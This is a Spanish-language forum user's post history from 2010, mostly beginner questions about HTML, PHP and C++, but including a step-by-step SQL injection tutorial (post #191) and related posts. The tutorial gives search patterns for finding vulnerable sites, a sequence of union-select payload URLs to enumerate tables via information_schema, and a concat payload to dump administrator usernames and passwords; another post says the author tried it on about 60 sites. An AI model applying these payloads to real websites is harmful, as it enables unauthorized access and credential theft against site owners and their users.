Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WiseHidden

Páginas 1 ... 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
#191
Nivel Web / SOLUCIONADO Problema Inyeccion SQL
25 Diciembre 2010, 12:47 PM
Gracias al apoyo y ala ayuda interminable de todos tenemos el problema resuelto.

Y para todo aquel que quiera "Aprender a encontrar la vulnerabilidad de una pagina web" Solo para entender,comprender y proteger de otros ataques les invito y me tomo la molestia de explicaros un ataque por Inyección SQL.

Citar

Definición de Ataque SQL:

La inyección SQL es el ataque vía web, que aprovecha Errores en la filtración de datos introducidos por el usuario, y que permiten a un atacante, tener control de cierta aplicación.

¿Que es Deface?

Es la modificación de una página web sin autorización del Administrador de la misma.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Nota: No todas las Paginas son vulnerables. Solo aquellas que por descuido, falta de conocimiento, Contraseñas débiles, errores en el FPT y un largo numero de errores o vulnerabilidades que nos permitan atraves de una inyección conocer el usuario y contraseña de Administración.


Nota2: Este pequeño tutorial es solamente para aquellos que quieran profundizar sus conocimientos sobre seguridad web, no para causar daños a terceros. (Pues esos terceros son programadores web, que al igual que a nosotros les fascina este amplio mundo que es la informática) Asi que no seais Malotes!!!! No me hago responsable, de los fines que hagais, eso queda en la conciencia de cada uno. (PERO EN ESTE PAIS PUEDEN CAERTE VARIOS AÑOS ENTRE REJAS!! Asi que pensarlo dos veces antes de hacer algo. ;D ;D ;D


Para comenzar antes tenemos que buscar con una referencia en nuestro buscador, lo que nos direccionará a una lista de web posiblemente vulnerables (RECUERDA NO TODAS LO SON) al menos no con este método.

.php?id=
.html?id=

(?id=NUMERO)

Para saber si es vulnerable tienes que quitar el numero, y poner '

Ejemplo :

http://www.WEBVICTIMA/noticia.php?id='

Vale es vulnerable. ¿Como lo sabemos? Facil por que nos ha tirado un error que es:

EJEMPLO:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/ioba.med.uva.es/abretusojos/noticia.php on line 7


(Normalmente suelen ser a si)

Ahora hay que quitar el '

y poner lo principal que es:

Código:

-1+union+all+select+0--

Y nos quedaría así:
Código:

http://www.WEBVICTIMA/noticia.php?id=-1+union+all+select+0"


Ahora hay que buscar tablas, para ello hay que ir añadiendo números [ 1,2,3,4,5,6,7,8 .. .. ] hasta que nos tire unos números.


Acontinuacion sacaremos  las table name. Poniendo al final de la url:

+from+information_schema.tables--

y coger un numero de los que te ha tirado,y borrar el name y poner table_name. Quedaría a si.

Ejemplo:

http://www.WEBVICTIMA/noticia.php?id=-1+union+all+select+0,1,2,table_name,4,5,6+from+information_schema.tables--

Ahora siempre al poner la injeccion, te saldrá CHARACTER_SETS que es la primera tabla.


Si te sale CHARACTER_SETS es que todo va bien, ahora tienes que borrar los -- [ Guion , Guion ] y poner:

+limit+1,1--

Ejemplo:

http://www.WEBVICTIMA/noticia.php?id=-1+union+all+select+0,1,2,table_name,4,5,6+from+information_schema.tables+limit+1,1--

Ahora hay que ir buscando tablas interesantes como; admin, user, root, login, administrator, etc.

En la base de datos, Hay alguna  tables que son default, que parecen importantes pero no lo son , esas tables son:

PROFILING,USER_PRIVILEGES,VIEWS.


http://www.WEBVICTIMA/noticia.php?id=-1+union+all+select+0,1,2,table_name,4,5,6+from+information_schema.tables+limit+12,1--

Ahora ya tenemos la table name de lo que queremos, ara hacemos lo siguiente:

Borramos:

information_schema.tables+limit+18,1--

EJEMPLO

http://www.WEBVICTIMA/noticia.php?id=-1+union+all+select+0,1,2,table_name,4,5,6+from+

Y despues del

+from+

ponemos la table importante que es: table_usuarios.

Ejemplo:

http://www.WEBVICTIMA/noticia.php?id=-1+union+all+select+0,1,2,table_name,4,5,6+from+table_usuarios

Ahora ya toca quitar el table_name que hay entre el 2 y el 4. Y poner nombre.

Ejemplo:

AVISO: No siempre es nombre, a veces si no funciona tienes que poner, admin,login,root,adm,administrador,etc.

Ponemos nombre y...


Hay tenemos el username!! Ahora falta la pass

Ahora como ya sabes el username, borra lo que hay entre el 2 y el 4. Y pon:
Código:

concat(nombre,0x3a3a,pass).

Ejemplo:

http://www.WEBVICTIMA/noticia.php?id=-1+union+all+select+0,1,2,concat%28nombre,0x3a3a,pass%29,4,5,6+from+table_usuarios

Si no te funciona, cambia donde pone pass [ concat(nombre,0x3a3a,pass) por clave,password,contraseña,etc.

Si todo va bien.......


Entre el user y pass lo separa 0x3a3a, 0x3a3a es hexadecimal, que significa " :: "

Y bueno asta aquí todo!!

PD: Este tutorial es una mezcla de recopilacion de muchos tutoriales que me han ayudado a conseguir este curioso e interesante ataque

Espero os sirva de ayuda para profundizar vuestros conocimientos

Un saludo

WiseHidden
#192
Nivel Web / Re: Problema Inyeccion SQL
22 Diciembre 2010, 13:38 PM
Citar
Comprueba que sea vulnerable haciendo una comparación lógica

Y como haria esa comprobacion? Sinceramente estoy empezando y no se moverte aun mucho por aqui.

gracias a todos por vuestra ayuda y orientacion

un saludo

atentamente

wisehidden

#193
Nivel Web / Re: Problema Inyeccion SQL
22 Diciembre 2010, 09:40 AM
Citar
No son las "tablas", son las "columnas". Y si no te sales, tengo 2 hipótesis. La primera, no estáis haciendo bien la inyección de código SQL y la segunda, que el target no es vulnerable. XD

Hombre!!! Ha esas conclusiones tambien he caido yo compadre!

Lo mas lógico es que no este haciendo bien la inyeccion del codigo, que lo hago tal como explique antes.

La segunda lo dudo, porque lo he probado con cerca de 60 paginas.
y en la mayoria he llegado hasta ......,100--
Asi que no se que puede ser.

De que forman lo hacen ustedes?

PD: Gracias por la correcion (columnas), lo tendre en cuenta apartir de ahora ajaja

Un saludo

Atentamente
WH
#194
Nivel Web / Asunto
21 Diciembre 2010, 22:19 PM
Llevo una semana "probando" las vulnerabilidades de las paginas atraves de las inyecciones SQL.

Segun trasteé por la red para saber si una pagina era vulnerable solo tenias que añadir (') sustuyendolo por lo/s numero/s

Ejemplo:

xxxxxx.php?id=250
xxxxxx.php?id='

si no nos decia nada referente a algun problema...... añadiamos lo siguiente.

xxxxxx.php?id=-1+union+all+select+0--

y luego ir probando xxxxxx.php?id=-1+union+all+select+0,1.......--

Hasta que te aparezcan "las tablas"

El problema es que ami nunca me salen.

A que se debe el problema???

PD: Es con fines educativos  :P
PD2: Disculpen los moderadores si este post no va en esta sección, pero lo creí el mas adecuado

Atentamente
WH
Gracias
#195
Nivel Web / Problema Inyeccion SQL
21 Diciembre 2010, 22:18 PM
Llevo una semana "probando" las vulnerabilidades de las paginas atraves de las inyecciones SQL.

Segun trasteé por la red para saber si una pagina era vulnerable solo tenias que añadir (') sustuyendolo por lo/s numero/s

Ejemplo:

xxxxxx.php?id=250
xxxxxx.php?id='

si no nos decia nada referente a algun problema...... añadiamos lo siguiente.

xxxxxx.php?id=-1+union+all+select+0--

y luego ir probando xxxxxx.php?id=-1+union+all+select+0,1.......--

Hasta que te aparezcan "las tablas"

El problema es que ami nunca me salen.

A que se debe el problema???

PD: Es con fines educativos  :P
PD2: Disculpen los moderadores si este post no va en esta sección, pero lo creí el mas adecuado

Atentamente
WH
Gracias
#196
Desarrollo Web / Me podrian ayudar con Pagina Web
16 Diciembre 2010, 17:01 PM
Hola a todos.

Llevo un par de años estudiando HTML.

Pero nunca habia terminado ningun proyecto, siempre lo dejaba a medias, y nunca termine por subir ninguna.

Pues bien, un buen amigo mio me pidió hacerle una web para su negocio y acepte. "sin animo de lucro" claro esta :D

Y la verdad que "puesto" todo cuanto sé.

El problema viene ahora.

Ha comprado un dominio, y se como subirlo y demas.

Mi pregunta es:
Al no acabar nunca ninguna pagina no conozco muy bien el tema del <--doctype >
Adjunto de que la pagina esta formada en tres frames. Y me gustaria saber como hacerlo para que no ocurra ningun problema y se vea bien

AGRADECERIA Vuestra ayuda.

Y agradeceria que le hecharais un vistazo ala pagina, para que me orienteis, y me aporteis vuestras sugerencias, que le podria añadir para hacerla mas profesional y atractiva.

Os adjunto es enlace:

http://www.megaupload.com/?d=81T6KNTW

POSIBLEMENTE EL ENLACE ESTARA EN "REVISION" pues la acabo de subir, pero cuando puedan hechelen un vistazo
MIL GRACIAS

Un saludo

Atentamente
WiseHidden//
#197
PHP / Re: Problema con Fondo de Imagen en PHP
14 Diciembre 2010, 22:36 PM
Citar
Tienes que subir la imagen al servidor xD

Yo la he subido junto con lo demas.

la he puesto del suguiente modo

<body background="Imagen.jpg">
luego e probado en subirla en una carpeta llamada Index y la he puesto del siguiente modo

<body background="Index/Imagen.jpg">
pero nada.

y en mi ordenador anteeees de subirla se veia perfecto, pero una vez subido nada

Citar
trata de poner la direccion completa

E puesto la imagen en Subirimagen.es pero me da opciones de imagen para foro; codigo html; y hipervinculo pero no para fondo.

estoy perdido.

WH
#198
PHP / Problema con Fondo de Imagen en PHP
14 Diciembre 2010, 14:09 PM
Hola a todos,

He subido una pagina en un hosting gratuito. (t35.com)
Mediante un ftp (FlashFXP)

Pero el problema es que domino bastante bien el html.
Pero esta pagina esta escrita en PHP.
Y le he agregado una imagen de fondo mediante la etiqueta de HTML

<Body Background="Imagen.jpg"> y en mi ordenador va perfectamente.
El problema es que cuando esta "subida" no se ve la imagen.

No se a que debe ser, si esque no reconoce la etiqueta en html.
o es problema del hosting, o del ftp.
O esque tengo que subir la imagen auna pagina como subirimagen.es y luego direccionarla.

PD: ES LA PRIMERA PAGINA QUE SUBO.

Un saludo y gracias

Atentamente

WH
#199
Programación C/C++ / Re: Alguien podria orientarme con mi Menu?
8 Diciembre 2010, 18:47 PM
Todo lo contrario.
Te estoy muy agradecido.
De hecho seguiré tu consejo, ya he empezado a leer el tuto que me has
Indicado

Mil gracias


Pd: leer no come a nadie!!! Muy bueno, he de decir en mi defensa
Q m encanta leer, de hecho 1 d mis grandes hobby pero me gusta
Leer libros de historia, suspense ect...
Y lo entiendo porque entiendo el castellano pero cuando hojee c++
creí leer japonés jaja pero tenéis razón lo mas lógico para empezar es leer un buen libro o por lo menos un buen tutorial


Gracias

Un saludo

Wh
#200
Programación C/C++ / Re: Alguien podria orientarme con mi Menu?
8 Diciembre 2010, 16:26 PM
Winroot, Winroot, Winroot, agradezco tu "interes" y tu orientacion, creeme que si, de verdad.

Pero ayer creo que explique bien mi razon de porque no me leo un libro de pe a pa para no entender nada, pues por lo menos ami parecer,asi entiendo y comprendo mejor este complejo lenguaje, y una vez que "entienda" un poquito cojere un buen libro y me lo leere detenidamente.

Pero si leere: lo que no hay que hacer en c/c++ by Littlehorse

y apartir de ahora me centrare en leer un libro.

Pero creeme no quiero que mal interpretes mi curiosidad y mi pasividad.

Mientras tanto agradeceria que dejarais "vuestra opinion" De como aprender cada uno a un lado, y aportais de una manera "un poco mas amena" la duda que se tiene, y no te lo tomes a mal, (pues seguire tu consejo) y empezare a leer algun buen libro o tutorial.

PD: No utilizo goto (aun no he podido tener la oportunidad de utilizarlo) pero si te has tomado la molestia de leer el post entero, sabras que he "copiado" el codigo de un autor Gibs. Jr. si mal no recuerdo, y solo he realizado unos minimos cambios.


Atentamente

WiseHidden

Páginas 1 ... 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23